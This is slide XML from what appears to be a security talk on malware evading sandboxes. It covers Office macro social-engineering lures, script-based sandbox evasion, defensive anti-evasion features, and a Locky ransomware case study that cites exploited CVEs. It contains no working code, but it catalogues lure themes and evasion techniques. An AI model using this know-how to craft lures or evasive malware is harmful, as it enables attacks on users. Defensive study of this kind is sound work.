              <a:t>1. Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Lure end user to shutdown security mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>E.g. Click to enable Office Macro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2. Evade security sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Traditional sandbox mainly focus on PE malware behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Monitor on system API and ignore script behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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640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402336" y="915566"/>
            <a:ext cx="8490144" cy="3960440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en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“Enable Editing”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This is when a file is coming from Internet or failed some file validation consistency checks. In this  case it is opened in Protected View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pP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“Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Content” 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      This is caused when you add certain “active content” or “content controls” to a document, such as ActiveX </a:t>
            </a:r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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>macros”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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 When  a file only has  macros, then Office displays this message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Lure to execute script (e.g. VBS)payload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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Embed a malicious package in Office to lure user to open and execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Social Engineering – Office script</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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563638"/>
            <a:ext cx="8439135" cy="444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2787774"/>
            <a:ext cx="7373250" cy="38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78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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Social Engineering – Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>script Lure tricks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/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Click to view Content" Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"Encrypted/Encoded/Blurred Documents" Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"Protected/Secured Documents" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Lures *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Protected by "Anti-Virus"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Offical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Notice/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Goverment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"Created in a newer/older version of Office" Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"View on Desktop/Laptop" Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An Error Has Occurred...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Invoice/Banking Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Resumes with Ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Resumes with Fake Ransomware Dialogs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Underachieving Lures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Encrypted Documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Embedded Malware Payloads (Non-Macro Threats) e.g. VBS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Other Miscellaneous Lures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198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30" y="699542"/>
            <a:ext cx="4981411" cy="383757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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Social Engineering – Office </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>script example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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093" y="1200986"/>
            <a:ext cx="4824536" cy="37496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4276" y="1494242"/>
            <a:ext cx="5894456" cy="345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2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Evade sandbox – Script evasion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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05" y="607376"/>
            <a:ext cx="7184855" cy="453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9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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>What is evasion as we define in practice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2336" y="1635646"/>
            <a:ext cx="8366760" cy="28083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3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Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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behavior to resist security protection by intention that affecting sandbox analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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419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59"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="17759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402336" y="915566"/>
            <a:ext cx="8490144" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Lure to Enable content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Office Script for evasion check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Drop binary payload to delete files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evade sandbox – Script evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Sample 1/3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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923678"/>
            <a:ext cx="8532440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6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123478"/>
            <a:ext cx="7992888" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evade sandbox – Script evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Sample 2/3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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607375"/>
            <a:ext cx="4744420" cy="4770925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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402336" y="915566"/>
            <a:ext cx="8490144" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Learn the evasion tricks from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>afishmacro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  evasion test </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0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 framework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739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123478"/>
            <a:ext cx="8136904" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Evade sandbox – Script evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Sample 3/3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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6" y="607375"/>
            <a:ext cx="9144792" cy="455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6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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Anti-evasion for Sandcastle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endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Identify and support much script type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Office, pdf, flash, java, JS, VBS……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Self-Adjustment scoring system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>More aggressive score in the same rule for script type malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>	comparing with pure PE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Enhance evasion detection related rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Much Runtime memory FLURT signature detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hide Virtual Machine signature </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VM backdoor configuration disable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hook to bypass VM signature check(e.g. VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Reg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File,Firmeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ICE (instruction control engine)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>trace and control execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Pattern to detection evasion (e.g. stalling code, logic bomb…)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840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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Noteworthy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Evasions in 2016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endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Ransomware evasions in 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>- Variation emerging with evasion tricks	</a:t>
            </a:r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CN" dirty="0"/>
              <a:t>Mac Ransomware Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>- Evasion tricks on Mac following up</a:t>
            </a:r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CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Attack boosting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>        - Only memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Kinds of files attack vector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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Multiple Malicious Script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Types coming up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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9216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03648" y="1923678"/>
            <a:ext cx="6329904" cy="1512168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" b="1" dirty="0" smtClean="0"/>
              <a:t>Noteworthy Evasion Case Study</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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153070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1"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="991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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Noteworthy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Evasions in 2016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endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Ransomware evasions in 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>- Variation emerging with evasion tricks	</a:t>
            </a:r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CN" dirty="0"/>
              <a:t>Mac Ransomware Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>- Evasion tricks on Mac following up</a:t>
            </a:r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CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Attack boosting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Memory execution vs Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Kinds of attack vector </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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933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64"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="14964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34" y="942980"/>
            <a:ext cx="8378200" cy="426094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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t> Ransomware Evasion Evolution in 2016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75656" y="843558"/>
            <a:ext cx="8366760" cy="3816424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Evasion tricks evolution in 2016 in brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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051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21"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="29321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123478"/>
            <a:ext cx="7344816" cy="483897"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TROJ_LOCKY.DLDRA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>  	1/4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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First discovered and analyzed in end of April 2016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Behavior in simple:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>      1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Locky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> Downloader execution with Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE vulnerability(CVE-2016-1019)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>      2. Local privilege escalation via kernel vulnerability (CVE-2015-1701)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          - Evade both user and kernel mode hook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- Anti-Sandbox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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Bypass user mode hook in Wow64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>program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          -Anti-Hook evasion for Wow64            </a:t>
